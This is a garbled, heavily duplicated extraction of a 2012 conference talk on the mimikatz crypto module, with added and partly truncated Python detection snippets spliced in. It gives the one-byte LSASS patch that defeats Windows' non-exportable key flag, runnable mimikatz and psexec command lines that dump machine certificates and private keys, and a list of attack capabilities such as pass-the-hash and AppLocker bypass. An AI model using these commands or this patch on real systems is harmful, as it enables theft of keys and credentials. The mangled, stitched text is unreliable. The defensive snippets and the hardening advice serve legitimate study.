	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk': KO - mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz crypto patchcng because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 49
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz crypto patchcng demo time
Import, export, import as not exportable… export again
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 50
mimikatz crypto patchcng limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?) – certutil can…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz :: that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: crypto :: cng :: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported ( level)
[Diagram: KeyIso Service (LSASS Process) – on NT6 a System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP. A process asks CNG to export a key; the request goes over RPC to KeyIso, which DPAPI-decodes and loads the private key, then tests "Exportable?": yes → Exported Key, no → NTE_NOT_SUPPORTED. The check is also labelled PLAYSKOOL on the slide.]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) > ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys
[user]
Clés CNG
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité : NON
    Taille clé    : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA?)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
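A defender-side check for the one-byte jnz → jmp rewrite described on the patchcng slides, which as the bonus slide notes survives until reboot or a KeyIso restart. This is an added example, neither slide content nor mimikatz code: it diffs a trusted copy of a code region against the copy read from the running process and flags a short conditional jump that has become an unconditional one. The address and the 75 1C / EB 1C bytes are the slide's; the surrounding bytes, the region base and all function names are constructed for the example.

```python
from dataclasses import dataclass
from typing import List

# Short conditional jumps (Jcc rel8, opcodes 0x70..0x7F) and the unconditional
# short jump (jmp rel8) that a one-byte patch turns them into.
JCC_SHORT = {
    0x70: "jo", 0x71: "jno", 0x72: "jb", 0x73: "jae", 0x74: "jz", 0x75: "jnz",
    0x76: "jbe", 0x77: "ja", 0x78: "js", 0x79: "jns", 0x7A: "jp", 0x7B: "jnp",
    0x7C: "jl", 0x7D: "jge", 0x7E: "jle", 0x7F: "jg",
}
JMP_SHORT = 0xEB


@dataclass
class Finding:
    va: int        # virtual address of the byte that differs
    expected: int  # byte in the trusted baseline
    found: int     # byte in the live copy
    note: str      # interpretation, when the difference has a known shape


def _rel8(b: int) -> int:
    """Interpret a byte as the signed 8-bit displacement of a short jump."""
    return b - 0x100 if b > 0x7F else b


def diff_code(baseline: bytes, live: bytes, base_va: int) -> List[Finding]:
    """Diff two copies of one code region and flag Jcc -> jmp rewrites.

    baseline: the region as it should be (e.g. the module's .text section from
              disk, relocated the same way as in the target process).
    live:     the same region as read from the running process.
    base_va:  virtual address of byte 0 of both buffers.
    Reading process memory is platform specific and left to the caller.
    """
    if len(baseline) != len(live):
        raise ValueError("baseline and live copies must cover the same region")
    findings: List[Finding] = []
    for off, (exp, got) in enumerate(zip(baseline, live)):
        if exp == got:
            continue
        note = ""
        nxt = off + 1
        # A Jcc rel8 whose opcode became EB while its displacement is untouched:
        # the branch now always goes where it previously went only when the
        # condition held, i.e. a check has been removed.
        if (exp in JCC_SHORT and got == JMP_SHORT and nxt < len(baseline)
                and baseline[nxt] == live[nxt]):
            target = base_va + nxt + 1 + _rel8(baseline[nxt])
            note = (f"{JCC_SHORT[exp]} short rewritten as jmp short to the same "
                    f"target {target:#x}: the condition is no longer checked")
        findings.append(Finding(base_va + off, exp, got, note))
    return findings


# Constructed sample region. The two bytes at 0x6C815210 are the ones on the
# slide (75 1C before the patch, EB 1C after); everything around them is
# filler invented for this example, not real ncrypt.dll code.
REGION_VA = 0x6C815200
PRISTINE = bytes.fromhex("8b45f885c0" + "90" * 11 + "751c" + "90" * 14)
PATCHED = PRISTINE[:0x10] + bytes([JMP_SHORT]) + PRISTINE[0x11:]


def scan_sample() -> List[Finding]:
    """Run the diff over the constructed sample; used by the stand-alone main."""
    return diff_code(PRISTINE, PATCHED, REGION_VA)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f.va:#010x}: expected {f.expected:02X}, found {f.found:02X}  {f.note}")
```

The note only fires when the displacement byte is unchanged, which is exactly the shape of the patch on the slide; any other byte difference is still reported, just without an interpretation.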
mimikatz :: crypto :: memo
Some commands
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng: because sometimes I own LSASS
This time the checks and the keys are in the LSASS process… And what? I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C jnz short continue_key_export
.text:6C815210 EB 1C jmp short continue_key_export
(The only change is the opcode byte: 0x75, jnz short, becomes 0xEB, jmp short. The 8-bit displacement 0x1C is untouched, so the jump still lands on continue_key_export, but now unconditionally: the export proceeds whatever the key's export policy says.)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 49
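The slide above shows the whole patch: one opcode byte. The Python below is an added example, not part of the talk and not mimikatz code. It models that byte flip on a constructed code fragment (so it runs offline without touching any process) and shows the detection-side check a defender would want: compare the code bytes read from the running LSASS with the clean on-disk copy and report every jnz-short that has become a jmp-short with an unchanged displacement. Only the two encodings 75 1C / EB 1C and the address 6C815210 come from the slide; the surrounding instructions, the image base and the symbol names are assumptions.

```python
"""
Added example (not from the talk, not mimikatz code): the one-byte patch
shown on the slide, modelled on a constructed x86 code fragment, plus the
matching detection check.  Only the encodings 75 1C / EB 1C and the address
6C815210 come from the slide; everything else here is an assumption.
"""
from __future__ import annotations

JNZ_SHORT = 0x75   # jnz/jne rel8 (2-byte short conditional jump)
JMP_SHORT = 0xEB   # jmp rel8     (2-byte short unconditional jump)

# Constructed stand-in for the code around the export-policy check: a flag
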